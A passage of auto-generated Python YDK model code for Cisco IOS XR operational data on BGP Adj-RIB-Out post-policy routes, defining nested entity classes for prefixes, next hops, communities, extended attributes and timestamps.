**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route, self).__init__()
self.yang_name = "route"
self.yang_parent_name = "routes"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved))])
self._leafs = OrderedDict([
('route', (YLeaf(YType.str, 'route'), ['str','str'])),
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
])
self.route = None
self.neighbor_address = None
self.path_id = None
self.valid_route = None
self.invalid_reason = None
self.best_path = None
self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName()
self.prefix_name.parent = self
self._children_name_map["prefix_name"] = "prefix-name"
self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList()
self.route_attr_list.parent = self
self._children_name_map["route_attr_list"] = "route-attr-list"
self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList()
self.ext_attributes_list.parent = self
self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate()
self.last_modified_date.parent = self
self._children_name_map["last_modified_date"] = "last-modified-date"
self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved()
self.last_update_recieved.parent = self
self._children_name_map["last_update_recieved"] = "last-update-recieved"
self._segment_path = lambda: "route"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
"""
Prefix
.. attribute:: prefix
Prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix>`
**config**\: False
.. attribute:: prefix_length
Prefix length
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName, self).__init__()
self.yang_name = "prefix-name"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix))])
self._leafs = OrderedDict([
('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
])
self.prefix_length = None
self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self._segment_path = lambda: "prefix-name"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName, ['prefix_length'], name, value)
class Prefix(_Entity_):
"""
Prefix
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "prefix-name"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
"""
RouteAttributesList
.. attribute:: next_hop
NextHopAddress
**type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop>`
**config**\: False
.. attribute:: aggregrator_attributes
AggregatorList
**type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes>`
**config**\: False
.. attribute:: origin_type
Origin Attribute Type
**type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
**config**\: False
.. attribute:: as_path
AS Path
**type**\: str
**config**\: False
.. attribute:: as4_path
AS4 Path
**type**\: str
**config**\: False
.. attribute:: med
Med
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_pref
LocalPref
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: atomic_aggr
AtomicAggr
**type**\: bool
**config**\: False
.. attribute:: community
CommunityArray
**type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList, self).__init__()
self.yang_name = "route-attr-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community))])
self._leafs = OrderedDict([
('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
('med', (YLeaf(YType.uint32, 'med'), ['int'])),
('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
])
self.origin_type = None
self.as_path = None
self.as4_path = None
self.med = None
self.local_pref = None
self.atomic_aggr = None
self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop()
self.next_hop.parent = self
self._children_name_map["next_hop"] = "next-hop"
self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes()
self.aggregrator_attributes.parent = self
self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
self.community = YList(self)
self._segment_path = lambda: "route-attr-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)
class NextHop(_Entity_):
"""
NextHopAddress
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop, self).__init__()
self.yang_name = "next-hop"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "next-hop"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop']['meta_info']
class AggregratorAttributes(_Entity_):
"""
AggregatorList
.. attribute:: as_
AS number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: as4
AS4 number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()
self.yang_name = "aggregrator-attributes"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
('address', (YLeaf(YType.str, 'address'), ['str'])),
])
self.as_ = None
self.as4 = None
self.address = None
self._segment_path = lambda: "aggregrator-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']
class Community(_Entity_):
"""
CommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community, self).__init__()
self.yang_name = "community"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
"""
ExtAttributesList
.. attribute:: originator_id
OriginatorID
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: aigp
AIGP
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: path_id
PathId
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cluster
ClusterList
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ext_community
ExtendedCommunityArray
**type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity>`
**config**\: False
.. attribute:: unknown_attributes
UnknownAttributes
**type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList, self).__init__()
self.yang_name = "ext-attributes-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes))])
self._leafs = OrderedDict([
('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
])
self.originator_id = None
self.aigp = None
self.path_id = None
self.cluster = []
self.ext_community = YList(self)
self.unknown_attributes = YList(self)
self._segment_path = lambda: "ext-attributes-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)
class ExtCommunity(_Entity_):
"""
ExtendedCommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()
self.yang_name = "ext-community"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "ext-community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']
class UnknownAttributes(_Entity_):
"""
UnknownAttributes
.. attribute:: attribute_type
AttributeType
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_length
AttributeLength
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_value
Atributevalue
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()
self.yang_name = "unknown-attributes"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
])
self.attribute_type = None
self.attribute_length = None
self.attribute_value = None
self._segment_path = lambda: "unknown-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
"""
LastModifiedDate
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate, self).__init__()
self.yang_name = "last-modified-date"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-modified-date"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
"""
LastUpdateRecieved
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved, self).__init__()
self.yang_name = "last-update-recieved"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-update-recieved"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes']['meta_info']
class NumRoutes(_Entity_):
"""
Number of routes in adjacency rib out\-bound
post\-policy table
.. attribute:: num_routes
NumRoutes
**type**\: int
